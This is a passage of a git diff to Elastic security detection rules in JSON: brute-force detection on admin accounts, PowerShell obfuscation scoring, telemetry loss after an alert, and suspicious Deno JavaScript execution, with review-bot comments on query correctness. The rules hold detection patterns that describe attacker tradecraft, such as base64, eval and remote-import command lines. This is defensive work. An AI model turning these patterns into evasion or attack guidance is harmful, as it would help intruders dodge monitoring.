Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', 
sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where event.action == \"logon-failed\" and winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and user.name : \"*admin*\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n", - "references": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" - ], - "related_integrations": [ - { - "package": "system", - "version": "^2.0.0" - }, - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.ip", - "type": "ip" - }, - { - "ecs": true, - "name": "user.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.computer_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.Status", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.logon.type", - "type": "unknown" - } - ], - "risk_score": 47, - "rule_id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide", - "Data Source: Windows Security Event Logs" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - 
"reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.001", - "name": "Password Guessing", - "reference": "https://attack.mitre.org/techniques/T1110/001/" - }, - { - "id": "T1110.003", - "name": "Password Spraying", - "reference": "https://attack.mitre.org/techniques/T1110/003/" - } - ] - } - ] - } - ], - "type": "eql", - "version": 114 - }, - "id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029_114", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_118.json b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_118.json new file mode 100644 index 00000000000..de4a585c416 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_118.json 
@@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple consecutive logon failures targeting more than one Admin account from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts.", + "from": "now-9m", + "language": "esql", + "license": "Elastic License v2", + "name": "Privileged Accounts Brute Force", + "note": "## Triage and analysis\n\n### Investigating Privileged Accounts Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against multiple accounts that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', 
sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, _version, _index\n| where event.category == \"authentication\" and host.os.type == \"windows\" and event.action == \"logon-failed\" and\n winlog.logon.type == \"Network\" and source.ip is not null and winlog.computer_name is not null and\n not cidr_match(TO_IP(source.ip), \"127.0.0.0/8\", \"::1\") and\n to_lower(winlog.event_data.TargetUserName) like \"*admin*\" and\n /*\n noisy failure status codes often associated to authentication misconfiguration\n 0xC000015B - The user has not been granted the requested logon type (also called the logon right) at this machine.\n 0XC000005E - There are currently no logon servers available to service the logon request.\n 0XC0000133 - Clocks between DC and other computer too far out of sync.\n 0XC0000192 An attempt was made to logon, but the Netlogon service was not started.\n 0xc00000dc - DC is in shutdown phase, it will normally tell current clients to use another DC for authentication.\n */\n not winlog.event_data.Status in (\"0xc000015b\", \"0xc000005e\", \"0xc0000133\", \"0xc0000192\", \"0xc00000dc\")\n// truncate the timestamp to a 60-second window\n| eval Esql.time_window = date_trunc(60 seconds, @timestamp)\n| stats Esql.failed_auth_count = COUNT(*),\n Esql.target_user_name_values = VALUES(winlog.event_data.TargetUserName),\n Esql.count_distinct_user_name = count_distinct(winlog.event_data.TargetUserName),\n Esql.user_domain_values = VALUES(user.domain),\n Esql.error_codes = VALUES(winlog.event_data.Status),\n Esql.data_stream_namespace.values = 
VALUES(data_stream.namespace) by winlog.computer_name, source.ip, Esql.time_window, winlog.logon.type\n| where Esql.failed_auth_count >= 50 and Esql.count_distinct_user_name >= 2\n| eval user.name = mv_first(Esql.target_user_name_values)\n| KEEP winlog.computer_name, source.ip, user.name, Esql.time_window, winlog.logon.type, Esql.*\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" + ], + "related_integrations": [ + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.count_distinct_user_name", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.data_stream_namespace.values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.error_codes", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.failed_auth_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.target_user_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.time_window", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.user_domain_values", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Windows Security Event Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": 
"Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "esql", + "version": 118 + }, + "id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029_118", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f9abcddc-a05d-4345-a81d-000b79aa5525_8.json b/packages/security_detection_engine/kibana/security_rule/f9abcddc-a05d-4345-a81d-000b79aa5525_8.json deleted file mode 100644 index 5af8eb64091..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/f9abcddc-a05d-4345-a81d-000b79aa5525_8.json +++ /dev/null 
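Review bot: The status-code exclusion in the new ES|QL query compares `winlog.event_data.Status` with `in` against lowercase literals (`"0xc000015b"`, …) while the comment directly above it lists the codes as `0xC000015B`/`0XC000005E` and the replaced EQL version (`_114`) matched them case-insensitively with `:`; `in` on a keyword column is an exact comparison, so if the logged values keep the uppercase hex form the noisy misconfiguration failures are no longer excluded and inflate `Esql.failed_auth_count`. Normalising the field first keeps the exclusion working whichever case the source emits: `not to_lower(winlog.event_data.Status) in ("0xc000015b", "0xc000005e", "0xc0000133", "0xc0000192", "0xc00000dc")`. Separately, `required_fields` no longer lists `winlog.event_data.Status`, `winlog.event_data.TargetUserName` or `event.action`, all of which the query still reads; if that list is tool-generated from the `KEEP` clause this is expected, otherwise they should be restored for schema validation. A minor style point: `Esql.data_stream_namespace.values` breaks the `_values` suffix convention used by the sibling `Esql.*_values` columns in the same `stats`.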
@@ -1,188 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts with a disproportionately high number of numeric characters, often indicating the presence of obfuscated or encoded payloads. This behavior is typical of obfuscation methods involving byte arrays, character code manipulation, or embedded encoded strings used to deliver and execute malicious content.", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential PowerShell Obfuscation via High Numeric Character Proportion", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via High Numeric Character Proportion\n\nPowerShell is a powerful scripting language used for system administration, but adversaries exploit its capabilities to obfuscate malicious scripts. Obfuscation often involves encoding payloads using numeric characters, making detection challenging. The detection rule identifies scripts with a high proportion of numeric characters, signaling potential obfuscation. 
By analyzing script length and numeric density, it flags suspicious activity, aiding in defense evasion detection.\n\n### Possible investigation steps\n\n- Review the script block text from the alert to understand the context and identify any obvious signs of obfuscation or malicious intent.\n- Examine the file path and host name fields to determine the origin and location of the script execution, which can help assess the potential impact and scope.\n- Check the user ID and agent ID fields to identify the user and system involved, which may provide insights into whether the activity is expected or suspicious.\n- Analyze the powershell.sequence and powershell.total fields to understand the sequence of script execution and the total number of scripts executed, which can indicate whether this is part of a larger pattern of behavior.\n- Investigate any related logs or alerts from the same host or user to identify patterns or correlations that might suggest broader malicious activity.\n\n### False positive analysis\n\n- Scripts with legitimate numeric-heavy content such as data processing or mathematical calculations may trigger the rule. To handle this, identify and whitelist specific scripts or script patterns that are known to be safe.\n- Automated scripts that generate or manipulate large datasets often contain high numeric content. Consider creating exceptions for scripts executed by trusted users or from known safe directories.\n- PowerShell scripts used for legitimate software installations or updates might include encoded data blocks. Review and exclude these scripts by verifying their source and purpose.\n- Scripts containing large hexadecimal strings for legitimate purposes, such as cryptographic operations, may be flagged. 
Use the exclusion pattern to filter out these known safe operations.\n- Regularly review and update the exclusion list to ensure it reflects the current environment and any new legitimate scripts that may be introduced.\n\n### Response and remediation\n\n- Immediately isolate the affected host to prevent further execution of potentially malicious scripts and limit lateral movement within the network.\n- Review the PowerShell script block text and script block ID to identify any malicious payloads or encoded strings. If confirmed malicious, remove or quarantine the script.\n- Conduct a thorough scan of the isolated host using updated antivirus and anti-malware tools to detect and remove any additional threats or remnants of the obfuscated script.\n- Analyze the file path and user ID associated with the script execution to determine if unauthorized access or privilege escalation occurred. Revoke any suspicious user access and reset credentials if necessary.\n- Escalate the incident to the security operations center (SOC) for further investigation and correlation with other alerts to assess the scope and impact of the threat across the network.\n- Implement enhanced monitoring and logging for PowerShell activities on all endpoints to detect similar obfuscation attempts in the future, focusing on scripts with high numeric character proportions.\n- Review and update endpoint protection policies to restrict the execution of scripts with high numeric density, ensuring compliance with security best practices and reducing the risk of obfuscation-based attacks.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where Esql.script_block_length > 1000\n\n// replace the patterns we are looking for with the \ud83d\udd25 
emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(powershell.file.script_block_text, \"\"\"[0-9]\"\"\", \"\ud83d\udd25\")\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = Esql.script_block_length - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// Calculate the ratio of special characters to total length\n| eval Esql.script_block_ratio = Esql.script_block_pattern_count::double / Esql.script_block_length::double\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_ratio,\n Esql.script_block_length,\n Esql.script_block_tmp,\n powershell.file.*,\n file.directory,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts with high numeric character ratio\n| where Esql.script_block_ratio > 0.35\n\n// Exclude Windows Defender Noisy Patterns\n| where not (\n file.directory == \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\Downloads\" or\n file.directory like (\n \"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows Defender Advanced Threat Protection\\\\\\\\DataCollection*\",\n \"C:\\\\\\\\Program Files\\\\\\\\SentinelOne\\\\\\\\Sentinel Agent*\"\n )\n )\n // ESQL requires this condition, otherwise it only returns matches where file.directory exists.\n or file.directory is null\n| where not powershell.file.script_block_text like \"*[System.IO.File]::Open('C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows Defender Advanced Threat Protection\\\\\\\\DataCollection*\"\n| where not powershell.file.script_block_text : \"26a24ae4-039d-4ca4-87b4-2f64180311f0\"\n", - "related_integrations": [ - { 
- "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_length", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_ratio", - "type": "double" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.directory", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "f9abcddc-a05d-4345-a81d-000b79aa5525", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit 
Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 8 - }, - "id": "f9abcddc-a05d-4345-a81d-000b79aa5525_8", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fc552f49-8f1c-409b-90f8-6f5b9869b6c4_2.json b/packages/security_detection_engine/kibana/security_rule/fc552f49-8f1c-409b-90f8-6f5b9869b6c4_2.json new file mode 100644 index 00000000000..480af0baa36 --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/fc552f49-8f1c-409b-90f8-6f5b9869b6c4_2.json 
@@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when an Elastic Defend endpoint alert is generated on a host and is not followed by any subsequent endpoint telemetry (process, network, registry, library, or DNS events) within a short time window. This behavior may indicate endpoint security evasion, agent tampering, sensor disablement, service termination, system crash, or malicious interference with telemetry collection following detection.", + "false_positives": [ + "Misconfiguration, system reboot, network issues or expected uninstall of the Elastic Defend agent." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Elastic Defend Alert Followed by Telemetry Loss", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Elastic Defend Alert Followed by Telemetry Loss\n\nThis rule identifies situations where an Elastic Defend alert is generated on a host and is not followed by\nany normal endpoint activity events within a short time window. 
This may indicate agent tampering, sensor\ndisablement, host shutdown, system crash, or defense evasion behavior.\n\n### Possible investigation steps\n\n- Review the original `endpoint.alert` event and identify the detection that triggered the alert.\n- Check the host\u2019s online status, uptime, and reboot history.\n- Verify the health and status of the Elastic Defend agent and related services.\n- Look for evidence of agent tampering, service stops, or security control modifications.\n- Correlate with activity immediately preceding the alert for signs of exploitation or evasion.\n- Determine if similar alert \u2192 silence patterns are occurring on other hosts.\n\n### False positive analysis\n\n- Legitimate system reboots or shutdowns\n- Network connectivity loss\n- Elastic Agent upgrades or restarts\n- Endpoint service crashes\n- Maintenance or IT operations\n\n### Response and remediation\n\n- Validate host and agent availability.\n- Reconnect or re-enroll the agent if telemetry is missing.\n- Isolate the host if malicious activity is suspected.\n- Investigate for security control tampering.\n- Perform broader environment hunting for similar patterns.\n", + "query": "sequence by host.id with maxspan=5m\n [any where event.dataset == \"endpoint.alerts\"]\n ![any where event.category in (\"process\", \"library\", \"registry\", \"network\", \"dns\", \"file\")]\n", + "references": [ + "https://attack.mitre.org/techniques/T1562/001/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "fc552f49-8f1c-409b-90f8-6f5b9869b6c4", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "Data Source: Elastic Defend", + "Use Case: Threat Detection", + "Tactic: Defense 
Evasion", + "Tactic: Execution", + "Rule Type: Higher-Order Rule", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1204", + "name": "User Execution", + "reference": "https://attack.mitre.org/techniques/T1204/", + "subtechnique": [ + { + "id": "T1204.002", + "name": "Malicious File", + "reference": "https://attack.mitre.org/techniques/T1204/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "fc552f49-8f1c-409b-90f8-6f5b9869b6c4_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff18d24b-2ba6-4691-a17f-75c4380d0965_1.json b/packages/security_detection_engine/kibana/security_rule/ff18d24b-2ba6-4691-a17f-75c4380d0965_1.json new file mode 100644 index 00000000000..24598d392de --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ff18d24b-2ba6-4691-a17f-75c4380d0965_1.json 
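Review bot: The description and the investigation guide list process, network, registry, library and DNS as the telemetry the rule waits for, but the `![any where event.category in (...)]` step of the query also includes `"file"`, so the prose understates what the negative match covers. Aligning the description, e.g. `(process, network, registry, library, DNS, or file events)`, and stating the `maxspan=5m` window explicitly where the guide says "a short time window" would let an analyst read the rule's behavior without opening the query. The Execution / T1204.002 (User Execution: Malicious File) mapping does not follow from the query, which only detects an `endpoint.alerts` event followed by silence on the same `host.id`; if it is meant to reflect the triggering alert rather than this rule's own logic, a sentence in the note saying so would avoid confusion during triage.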
@@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects execution of JavaScript via Deno with suspicious command-line patterns (base64, eval, http, or import in a javascript context). Adversaries may abuse Deno to run malicious JavaScript for execution or staging.", + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious JavaScript Execution via Deno", + "note": "## Triage and analysis\n\n### Investigating Suspicious JavaScript Execution via Deno\n\nDeno is a legitimate JavaScript/TypeScript runtime. This rule fires when a Deno process (identified by name, PE original filename, or code signer \"Deno Land Inc.\") is started with a command line matching suspicious patterns: javascript with base64, eval(, http, or javascript import. 
Such patterns are commonly used to run inline or remote scripts and can indicate abuse.\n\n### Possible investigation steps\n\n- Review process.command_line and process.args to see the exact script or URL being executed.\n- Identify the parent process and how Deno was launched (user, script, terminal, or other tool).\n- Check whether Deno is approved on the host; if not, treat as potential unauthorized software execution.\n- Correlate with file creation or network events around the same time (downloads, script drops).\n\n### False positive analysis\n\n- Legitimate development or automation that runs Deno with eval, http imports, or base64-encoded snippets may trigger; allowlist by host or command-line pattern where appropriate.\n\n### Response and remediation\n\n- If abuse is confirmed: contain the host, terminate the Deno process, and remove or block Deno if not authorized; investigate how the script was delivered and scope for similar activity.\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"deno.exe\" or ?process.pe.original_file_name == \"deno.exe\" or ?process.code_signature.subject_name == \"Deno Land Inc.\") and\n process.command_line : (\"*javascript*base64*\", \"*eval(*\", \"*http*\", \"*javascript*import*\")\n", + "references": [ + "https://reliaquest.com/blog/threat-spotlight-casting-a-wider-net-clickfix-deno-and-leaknets-scaling-threat", + "https://deno.com/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": 
